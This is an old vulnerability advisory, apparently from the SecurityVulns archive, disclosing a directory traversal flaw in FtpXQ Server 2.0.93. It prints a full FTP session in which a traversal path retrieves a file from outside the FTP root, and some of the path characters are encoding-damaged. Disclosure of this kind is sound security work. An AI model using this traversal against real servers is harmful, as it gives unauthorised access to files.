SecurityvulnsSECURITYVULNS:DOC:1336Vulnerability in FtpXQ Server
----- Begin Hush Signed Message from [email protected] -----
Vulnerability in FtpXQ Server
Overview
FtpXQ Server 2.0.93 is an ftp server available from
http://www.datawizard.net and http://www.download.com. A
vulnerability
exists which allows an attacker to download files outside the ftp
root.
Details
The following is an illustration of the problem. An ftp root of
"c:\directory\directory" was used.
% ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.93).
User (xxxxxxxxx.rh.rit.edu:(none)): test
331 OK need password.
Password:
230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
ftp> pwd
257 Remote directory is "/directory/directory/"
ftp> cd β¦
550 Requested file action not takenβuser does not have access.
ftp> get β¦/β¦/autoexec.bat
200 OK
150 Opening data connection.
226 Transfer completed.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
ftp>
Solution
No quick fix is possible.
Vendor Status
DataWizard Technologies, Inc. was contacted via
<[email protected]>
on Tuesday, February 20, 2001. No reply was received.
- Joe Testa ( e-mail: [email protected] / AIM:
LordSpankatron )
----- Begin Hush Signature v1.3 -----
C4CVJ/O5Iirb1y03vGfBsqdGexnj3/RUVEbhv0/w08ZTxg2pfofU7ZF+vHoXjaO8vxnV
b23thdtkJfxlJJjeQa8/z1WKCkSf8X66v5/a07YoqLjFOqcQvvUQ1Y0uizNWgLlxB76y
DRYXaEd1YR3zd4dPlpw9I9U8jXPkoxzrmDLq/wBHVLYXkV6Nu3jS7XSJNjthJB7phS5g
UcrDiHkHVQrgqkVnNxBtdWwzK9zwzYd6mlcE153NBLmGERMBd87nN6phYKpYZ3dQU/iS
8qkQcw4CBv8bwM3B0sBffs/YCJB1JyL7dxlxS7CDE2Kmps8PjeGY0JvrOtuXjz1rMLU3
eiAALpHjcavmp2e44+Yo3it32Sbe2kwHiYDDhDbhfeXhfUNTMz7rK/HrtazI4ohYiIVf
XkHU4XWoE9fhX5V72ffYuCz+uMzmKsjrbHHviG7SPRkdIbbOdww5TStGqRxNRYLFrP1Q
SyBsEsdXaPnIpiYnulAbq/L1521pwOEosKIqbwl4DAws
----- End Hush Signature v1.3 -----
This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
Free, encrypted, secure Web-based email at www.hushmail.com